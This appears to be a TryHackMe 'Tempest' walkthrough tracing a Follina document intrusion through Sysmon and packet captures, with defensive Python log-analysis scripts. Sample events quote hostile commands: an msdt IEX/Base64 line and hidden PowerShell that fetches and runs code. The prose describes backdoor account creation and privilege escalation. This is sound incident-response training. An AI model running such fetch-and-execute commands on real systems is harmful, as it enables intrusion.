Refer to Tempest for the challenge room on TryHackMe
Preparation - Tools and Artifacts
Toolset
- Sysmon Logs
- Windows Event Logs
- Packet Capture
Endpoint Logs
To analyze Windows artefacts like Windows Event Logs and Sysmon logs, we will use the following tools:
- EvtxEcmd
- Timeline Explorer
- SysmonView
- Event Viewer
Network Logs
To analyze the provided packet capture, we will use the following tools:
- Wireshark
- Brim
Initial Access - Malicious Document
Tempest Incident
In this incident, we will serve as an Incident Responder following an alert triaged by a SOC analyst. The analyst has confirmed that the alert is of CRITICAL severity and requires further investigation. According to the SOC analyst, the intrusion began with a malicious document. The key details from the alert are as follows:
- The malicious document has a .doc extension.
- The user downloaded the document via chrome.exe.
- The document executed a chain of commands to achieve code execution.
Investigation Guide
To assist with the investigation, refer to the team's cheatsheet for this scenario:
- Begin with the events generated by Sysmon.
- Use EvtxEcmd, Timeline Explorer, and SysmonView to interpret Sysmon logs.
- Follow the child processes of WinWord.exe.
- Apply filters like ParentProcessID or ProcessID to correlate process relationships.
- Focus on Sysmon events such as Process Creation (Event ID 1) and DNS Queries (Event ID 22) to analyze the activity from the malicious document.
Task
Before investigating with Timeline Explorer, we need to convert the Sysmon logs to a .csv file. After that, we will load the `sysmon.csv` file into Timeline Explorer.
C:\Tools\EvtxECmd> EvtxECmd.exe -f "<Path_sysmon.evtx>" --csv "<output_directory>" --csvf "<output_file.csv>"
Before investigating with SysmonView, we need to convert the Sysmon logs to a .xml file. To do this, double-click the `sysmon.evtx` file and select "Save All Events As" from the Action panel. After that, we will load the `sysmon.xml` file into SysmonView.
The user of this machine was compromised by a malicious document. What is the file name of the document?
In this scenario, we know that the victim downloaded the malicious file using `chrome.exe`. We can locate the malicious file using both tools.
In SysmonView, search for `chrome.exe` and open all available sessions. The file name will be listed in the summary of the events.

In Timeline Explorer, search for "chrome.exe" to find the file name in the Payload Data4 column.

What is the name of the compromised user and machine?
In SysmonView, refer to the previous screenshot to identify the username associated with the download of the malicious file in their download directory. The machine name can be found in the tree map.

In Timeline Explorer, we can find the machine name and username in the Username column.

What is the PID of the Microsoft Word process that opened the malicious document?
In SysmonView, search for `WinWord.exe` as indicated in the Investigation Guide. After loading all available sessions, look for a File Created event associated with the executable. By double-clicking it, you can retrieve more details, including the PID.

In Timeline Explorer, search for `WinWord.exe` as suggested in the Investigation Guide. The PID of the MS Word process can be found in the Payload Data1 column.

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?
In SysmonView, we can observe multiple network connections made by the executable. All connections are through port 443, except for one that uses port 80.

To confirm, I checked VirusTotal, which indicated that the IP address had malicious activity.

In Timeline Explorer, we can find the suspicious IP address in the Payload Data6 column. Additionally, the executable is attempting to access phishteam.xyz, which is listed in the Payload Data4 column.

What is the base64 encoded string in the malicious payload executed by the document?
Since we have the PID that executed the malicious document, we will search for any processes created by it. To do this, look for the PPID in the Payload Data5 column.

We can find the executed command in the Executable Info column. Double-click on the cell to view the cell contents.
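To automate the PID/PPID walk the Investigation Guide describes, and the Base64 decoding that is otherwise done by hand in CyberChef, here is an added Python example (not from the room or the author of this writeup). The sample events, PIDs, paths and payload URLs are constructed, and the Follina-style msdt command line is illustrative only.

```python
"""Walk the Sysmon Event ID 1 process tree beneath WinWord.exe (the PID/PPID
correlation the guide describes) and decode Base64 payloads in descendant command lines."""
import base64
import binascii
import re

def _b64(text, utf16=False):  # builds the constructed sample payloads below
    return base64.b64encode(text.encode("utf-16-le" if utf16 else "utf-8")).decode()

# Constructed rows keyed by the EvtxECmd column names used here. PIDs, paths and
# payload URLs are made up; only the tooling shape is real.
STAGE1_CMD = "iex (iwr http://payload.example.invalid/update.zip -UseBasicParsing)"
STAGE2_CMD = "iex (iwr http://payload.example.invalid/first.exe -UseBasicParsing)"
SAMPLE_EVENTS = [
    {"EventId": 1, "ProcessId": 3400, "ParentProcessId": 1200,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'WINWORD.EXE /n "C:\Users\user\Downloads\invoice.doc"'},
    {"EventId": 1, "ProcessId": 3550, "ParentProcessId": 3400, "Image": r"C:\Windows\System32\msdt.exe",
     # Follina-style call: the payload is UTF-8 text run through FromBase64String
     "CommandLine": "msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param \"IT_BrowseForFile=$(IEX("
                    "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + _b64(STAGE1_CMD) + "'))))\""},
    {"EventId": 1, "ProcessId": 3600, "ParentProcessId": 3550, "CommandLine": "sdiagnhost.exe -Embedding",
     "Image": r"C:\Windows\System32\sdiagnhost.exe"},
    {"EventId": 1, "ProcessId": 3700, "ParentProcessId": 3600,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # -enc takes UTF-16LE Base64, which is why the two stages decode differently
     "CommandLine": "powershell.exe -w hidden -enc " + _b64(STAGE2_CMD, utf16=True)},
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def decode_b64_tokens(cmdline):
    """Decode every Base64-looking token; a NUL in every odd byte position means
    UTF-16LE (PowerShell -EncodedCommand), anything else is treated as UTF-8."""
    decoded = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(tok, validate=True)
            utf16 = len(raw) % 2 == 0 and not any(raw[1::2])
            decoded.append(raw.decode("utf-16-le" if utf16 else "utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # long alphanumeric run that is not Base64 (GUID fragment, hostname)
    return decoded

def investigate(events, root_image="WINWORD.EXE"):
    """(depth, image name, decoded payloads) for every process spawned, directly or
    indirectly, by the first process whose image matches root_image."""
    by_parent = {}
    for e in events:
        if e["EventId"] == 1:
            by_parent.setdefault(e["ParentProcessId"], []).append(e)
    root = next(e for e in events if e["Image"].upper().endswith(root_image.upper()))
    tree = []
    def walk(pid, depth):  # follows ProcessId -> ParentProcessId, as the PPID filter does by hand
        for child in by_parent.get(pid, []):
            tree.append((depth, child["Image"].rsplit("\\", 1)[-1], decode_b64_tokens(child["CommandLine"])))
            walk(child["ProcessId"], depth + 1)
    walk(root["ProcessId"], 0)
    return tree

if __name__ == "__main__":
    for depth, image, payloads in investigate(SAMPLE_EVENTS):
        print("  " * depth + image, *payloads)
```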

What is the CVE number of the exploit used by the attacker to achieve a remote code execution?
By searching for "mpsigstub.exe remote code execution" on Google, I found the article titled "Follina: Microsoft Support Diagnostic Tool RCE Vulnerability Under Active Exploitation". This article details the vulnerability, its exploitation, and the associated CVE number.
Initial Access - Stage 2 execution
Based on the initial findings, we discovered a stage 2 execution: the document successfully executed a Base64-encoded command. Decoding this string reveals the exact command chain executed by the malicious document.
Investigation Guide
With these discoveries, we can refer back to the cheatsheet to continue the investigation:
- The Autostart execution has explorer.exe as its parent process (PPID).
- Child processes of explorer.exe within the event timeframe may be significant.
- Process Creation (Event ID 1) and File Creation (Event ID 11) following the document execution are worth examining.
Task
The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?
First, we will decode the base64 string obtained from the previous question. By copying and pasting the string into Cyberchef, we can determine the payload executed by the malicious document.

Note: The command downloads a .ZIP file and extracts its contents into the Startup folder of the Start Menu. After extraction, it deletes the ZIP file to clean up.
By analyzing the command, I noted that the startup folder is involved. By inputting the path ($app\Microsoft\Windows\Start Menu\Programs\Startup) into ChatGPT, I received the full path. I then just needed to fill in the username.
C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?
As the Investigation Guide suggested, "The Autostart execution indicates explorer.exe as its PPID." I retrieved two PIDs from explorer.exe by searching in the Payload Data3 column in Timeline Explorer.

I filtered the PIDs separately in the Payload Data3 column and found the processes created by PowerShell.

By double-clicking to open the cell contents, I recognized the domain phishteam[.]xyz, which we encountered in the decoded payload. This is also the executed command following a successful login of the compromised user.

Note: The command uses PowerShell to download an executable file from a URL and saves it to the “Downloads” folder in the Public directory of all users while running the PowerShell window in hidden mode. After downloading, it immediately executes the downloaded file.
Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?
After identifying the name of the downloaded file (first.exe), I used it as a filter in the Executable Info column to retrieve its SHA256 hash value.

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?
SysmonView offers a clearer view of the network connections made by the malicious file. After searching for the file (first.exe) and opening the sessions, we can identify the C2 server's domain name, IP address, and port.

Initial Access - Malicious Document Traffic
Based on the collected findings, we determined that the attacker fetched the stage 2 payload remotely:
- Identified the domain and IP invoked by the malicious document in the Sysmon logs.
- Identified another domain and IP used by the stage 2 payload, logged from the same data source.
Investigation Guide
Since we have identified network-related artefacts, we can refer to our cheatsheet focusing on Network Log Analysis:
- Brim and Wireshark to investigate the packet capture.
- Look for network events related to the harvested domains and IP addresses.
- A sample Brim filter: _path=="http" "<malicious domain>".
Data Sources:
- Packet Capture
Task
What is the URL of the malicious payload embedded in the document?
At this stage, we know there are two malicious domains: "phishteam.xyz," executed by `WinWord.exe`, and "solvecyber.xyz," executed by `first.exe` whenever a user logs into the machine. I searched both domains since the question didn't specify which document. I found the URL embedded in the malicious `WinWord.exe` by searching for the first malicious domain, "phishteam.xyz."
By analyzing the traffic, I learned that the payload first retrieves `index.html`, then `update.zip`. This file is extracted to the startup folder, which will retrieve `first.exe` when a user logs in.
WireShark: http contains "phishteam.xyz"
Brim: _path=="http" "phishteam.xyz" | cut ts, host, uri

What is the encoding used by the attacker on the c2 connection?
I followed the HTTP stream of the packet that retrieves `index.html` from the C2 server on WireShark. By using the search term "encod," I discovered another encoded string.

The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?
As the question mentions the C2 binary (first.exe), we now search for the second malicious domain, "solvecyber.xyz".
WireShark: http contains "solvecyber.xyz"
The request URI indicates a resource being requested from the server, with the portion after the ? serving as a query string. The query parameter contains a Base64-encoded value that decodes to the command "whoami - tempest\benimaru".

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?
As the screenshot shows, the specific URL before the query serves as a unique identifier for a resource on the server, which is used for accessing a particular file or executing a command.
What is the HTTP method used by the binary?
The HTTP method can be found in the previous screenshot.
Based on the user agent, what programming language was used by the attacker to compile the binary?
We can identify the programming language by examining the user-agent of the same packet in Wireshark, as mentioned in the previous question.
Note: Nim is a statically typed language that compiles to C, and its HTTP client library facilitates making HTTP requests.

Discovery - Internal Reconnaissance
Investigation Guide
Based on the collected findings, we have discovered that the malicious binary continuously uses C2 traffic:
- Decode the encoded string found in the network traffic.
- Traffic includes commands and outputs executed by the attacker.
Task
To continue with the investigation, we may focus on the following information:
- Find network and process events connecting to the malicious domain.
- Find network events that contain an encoded command.
- Use Brim to filter all packets containing the encoded string.
- Look for endpoint enumeration commands since the attacker is already inside the machine.
In addition, we may refer to the Brim cheatsheet to investigate the encoded traffic and get all HTTP requests related to the malicious C2 traffic:
Brim: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts
Significant Data Sources:
- Packet Capture
- Sysmon
The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the file?
While investigating the traffic between the compromised machine and the malicious domain using the filters provided in the Investigation Guide, I encountered a payload that mentioned the password instead of any sensitive file content being transferred over the network.
Brim: _path=="http" "solvecyber.xyz" id.resp_p==80 | cut ts, host, id.resp_p, uri | sort ts
Note: The attacker retrieves commands from the server to enable dynamic execution of tasks, allowing for real-time adaptability based on the target’s environment. This approach enhances evasion tactics and helps automate malicious operations, making it harder for security tools to detect and flag suspicious behavior.

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?
As I continued decoding the query, I found a netstat output. Further research revealed that the attacker exploited the WinRM (Windows Remote Management) port. For more information, refer to "Abusing Windows Remote Management (WinRM) with Metasploit" on Rapid7.
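As an added example (not part of the original writeup), the following Python script decodes the Base64 query parameter in the requests returned by the Brim filter above and checks any netstat output it recovers for listening ports that expose a remote shell. The `/cmd` path, `out` parameter and timestamps are constructed placeholders; only the domain and port come from the writeup.

```python
"""Decode the Base64 query parameter in C2 requests exported from Brim with the filter
above (cut ts, host, id.resp_p, uri) and flag remote-shell listeners in any netstat output."""
import base64
import binascii
from urllib.parse import parse_qsl, urlsplit

REMOTE_SHELL_PORTS = {5985: "WinRM (HTTP)", 5986: "WinRM (HTTPS)", 3389: "RDP", 22: "SSH"}

def _b64(text):  # used only to build the constructed sample below
    return base64.b64encode(text.encode()).decode()

# Constructed tab-separated rows in the Brim column order. Domain and port are from
# the writeup; the path "/cmd" and parameter "out" are placeholders for the values
# the task asks you to recover from the pcap.
SAMPLE_TSV = "\n".join([
    "17:16:20\tsolvecyber.xyz\t80\t/cmd",
    "17:16:21\tsolvecyber.xyz\t80\t/cmd?out=" + _b64("tempest\\benimaru"),
    "17:16:50\tsolvecyber.xyz\t80\t/cmd",
    "17:16:51\tsolvecyber.xyz\t80\t/cmd?out=" + _b64(
        "  TCP    0.0.0.0:5985     0.0.0.0:0    LISTENING    4\r\n"
        "  TCP    10.0.0.5:49821   10.0.0.1:80  ESTABLISHED  3412\r\n"),
])

def _decode_param(value):
    """Base64-decode a query value. A raw '+' arrives as a space after URL parsing
    and padding is often dropped in URLs, so repair both first; None if not Base64."""
    fixed = value.replace(" ", "+")
    fixed += "=" * (-len(fixed) % 4)
    try:
        return base64.b64decode(fixed, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def decode_requests(tsv):
    """Return (ts, kind, param, text) per request: 'fetch' for a bare poll of the
    command URL, 'result' for a request carrying (decoded) command output."""
    rows = []
    for line in tsv.splitlines():
        ts, _host, _port, uri = line.split("\t")
        parts = urlsplit(uri)
        params = parse_qsl(parts.query, keep_blank_values=True)
        if not params:
            rows.append((ts, "fetch", "", parts.path))
        for name, value in params:
            text = _decode_param(value)
            rows.append((ts, "result", name, value if text is None else text))
    return rows

def remote_shell_listeners(netstat_text):
    """Map LISTENING TCP ports in `netstat -ano` output to known remote-access services."""
    found = {}
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) >= 4 and cols[0] == "TCP" and cols[3] == "LISTENING":
            port = int(cols[1].rsplit(":", 1)[1])
            if port in REMOTE_SHELL_PORTS:
                found[port] = REMOTE_SHELL_PORTS[port]
    return found

if __name__ == "__main__":
    for row in decode_requests(SAMPLE_TSV):
        print(*row[:3], repr(row[3][:60]), remote_shell_listeners(row[3]) if row[1] == "result" else "")
```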

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?
While browsing through the Sysmon log in Timeline Explorer, I noted that the netstat command was executed at 17:16:51. I then identified a binary that connected to the malicious IP address we noted earlier via port 8080, which is commonly used by Metasploit.

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?
To find the binary's hash value, navigate to the Payload Data3 column in Timeline Explorer.

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.
By pasting the hash value of the binary into VirusTotal, we can determine its name.

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?
As the screenshot shows, wsmprovhost.exe is executed after the reverse shell binary.
Note: wsmprovhost.exe acts as a helper process for WinRM, enabling it to execute remote management tasks and commands on a target computer. WinRM provides authentication using various methods, including NTLM, Kerberos, Basic Authentication, and CredSSP.

Privilege Escalation - Exploiting Privileges
Based on the collected findings, the attacker established a stable shell through a reverse SOCKS proxy.
Investigation Guide
With this information, we can focus on the following network and endpoint events:
- Look for events executed after the successful execution of the reverse SOCKS proxy tool.
- Investigate potential privilege escalation attempts, as the attacker has established persistent low-privilege access.
Significant Data Sources:
- Packet Capture
- Sysmon
Task
After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?
From previous tasks, we know that the attacker executed `ch.exe` for a reverse connection. We will continue tracking any events created after the execution of this malicious binary. As shown in the screenshot, the attacker used PowerShell to download another binary, which is what we are looking for.

To learn its SHA256 hash value, we need to search for the event of that binary being executed and correlate it with the Payload Data3 column.

Based on the SHA256 hash of the binary, what is the name of the tool used?
By pasting the hash value of the binary into VirusTotal, we can determine its name.

The tool exploits a specific privilege owned by the user. What is the name of the privilege?
After some research on VirusTotal, I found a GitHub repository describing the exploitation.
Note: SeImpersonatePrivilege refers to a Windows privilege that allows a user or process to impersonate another user. This matters for security and access control, as it enables an application to perform actions on behalf of a user with the same permissions and rights that user has.

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?
Referring to the screenshot that correlates the malicious binary (`spf.exe`) with its SHA256 hash value, we can see that there's a command associated with another binary.
C:\Users\benimaru\Downloads\spf.exe -c C:\ProgramData\<binary.exe>
Note: The command executes spf.exe with the -c option, configuring it to establish a reverse shell connection to an attacker’s machine. The specified binary contains additional resources or configurations needed for this operation.
The binary connects to a different port from the first c2 connection. What is the port used?
First, I noted the execution time of both binaries from the previous question.

Next, I navigated to Wireshark to check for any connections established at the time the binaries were executed. By entering the C2 server’s IP address and looking at the timestamps, I identified an additional port opened for the reverse shell connection.

Actions on Objective - Fully-owned Machine
Now that the attacker has gained administrative privileges on the machine, we should identify all persistence techniques used by the attacker. Additionally, look for unusual executions related to the malicious C2 binary used during privilege escalation.
Investigation Guide
Now, we can use our cheatsheet to investigate events following a successful privilege escalation:
- Useful Brim filter to get all HTTP requests related to the malicious C2 traffic
- The attacker has gained SYSTEM privileges; therefore, the user context for each malicious execution is now associated with NT AUTHORITY\SYSTEM.
- All child events of the new malicious binary used for C2 should be examined.
Brim: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts
Significant Data Sources:
- Packet Capture
- Sysmon
- Windows Event Logs
Task
Upon achieving SYSTEM access, the attacker then created two users. What are the account names?
On Windows, user accounts are typically created with `net.exe`. After adding the keyword "net" in the Executable Info column in Timeline Explorer and navigating to the timeline after 17:21:34, when the reverse shell connection was established, I found that two new users were created by `net.exe` and `net1.exe`.

Note: net.exe is a built-in Windows command-line utility that allows users to manage network resources, user accounts, and services. net1.exe is an alternative version of net.exe used primarily for compatibility in specific Windows environments or older systems.
Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?
I scrolled up to the earlier processes and found that the commands were missing one option, which can be seen in the previous screenshot.

Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?
Refer to the Microsoft Documentation for details on the Event ID that indicates account creation activity.

The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?
The command can be found after the creation of the new users under the same column (Executable Info) on Timeline Explorer.

Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?
Refer to the Microsoft Documentation for details on the Event ID that indicates the addition to a sensitive local group.
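An added example, not from the writeup or the room, that correlates the net.exe/net1.exe command lines seen in Timeline Explorer with Security log event IDs 4720 (user account created) and 4732 (member added to a security-enabled local group), so a command that merely ran is not mistaken for one that worked. The events, account name and password are constructed, and the Security event details are simplified to the fields the correlation needs.

```python
"""Correlate net.exe/net1.exe account commands from Sysmon Event ID 1 with Security
events 4720 (user account created) and 4732 (member added to a security-enabled local
group), so failed attempts stand out from the ones that took effect."""
import re
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"
NET_USER = re.compile(r"^net1?(?:\.exe)?\s+user\s+(?P<acct>[^/\s]\S*)(?P<rest>.*)$", re.I)
NET_GROUP = re.compile(r"^net1?(?:\.exe)?\s+localgroup\s+(?P<group>\S+)\s+(?P<member>\S+)\s+/add", re.I)

# Constructed events as (time, source, event id, detail), the way they line up in
# Timeline Explorer when both the Sysmon and Security evtx exports are loaded.
# Account name and password are placeholders, not values from the room.
SAMPLE_EVENTS = [
    ("2022-06-20 17:22:01", "Sysmon", 1, "net  user svc_backup P@ssw0rd!"),        # no /add: fails
    ("2022-06-20 17:22:09", "Sysmon", 1, "net  user svc_backup P@ssw0rd! /add"),
    ("2022-06-20 17:22:09", "Sysmon", 1, "net1  user svc_backup P@ssw0rd! /add"),  # net.exe hands off to net1.exe
    ("2022-06-20 17:22:10", "Security", 4720, "TargetUserName=svc_backup"),
    ("2022-06-20 17:22:30", "Sysmon", 1, "net  localgroup administrators svc_backup /add"),
    ("2022-06-20 17:22:30", "Security", 4732, "TargetUserName=Administrators MemberName=svc_backup"),
]

def _confirmed(security, eid, needle, when, window):
    """True when a Security event `eid` naming `needle` lies within `window` of `when`."""
    return any(e == eid and needle.lower() in d.lower() and abs(ts - when) <= window
               for ts, e, d in security)

def correlate(events, window=timedelta(seconds=5)):
    """One finding per net.exe command; 'confirmed' comes from the Security log, not
    from the command line, because a command that ran is not a command that worked."""
    security = [(datetime.strptime(t, FMT), eid, d) for t, src, eid, d in events if src == "Security"]
    findings = []
    for t, src, eid, cmd in events:
        if (src, eid) != ("Sysmon", 1):
            continue
        when = datetime.strptime(t, FMT)
        if m := NET_USER.match(cmd):
            acct = m.group("acct")
            findings.append({"cmd": cmd, "action": "create", "account": acct,
                             "has_add": "/add" in m.group("rest").lower().split(),
                             "confirmed": _confirmed(security, 4720, acct, when, window)})
        elif m := NET_GROUP.match(cmd):
            findings.append({"cmd": cmd, "action": "group_add", "group": m.group("group"),
                             "account": m.group("member"),
                             "confirmed": _confirmed(security, 4732, m.group("member"), when, window)})
    return findings

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print("OK    " if f["confirmed"] else "FAILED", f["action"], f["account"], "|", f["cmd"])
```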

After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this?
After continuing the investigation into the processes following the commands from previous tasks, I found the command that used the malicious binaries we had identified earlier. By analyzing the command, I learned that it was intended for persistence.
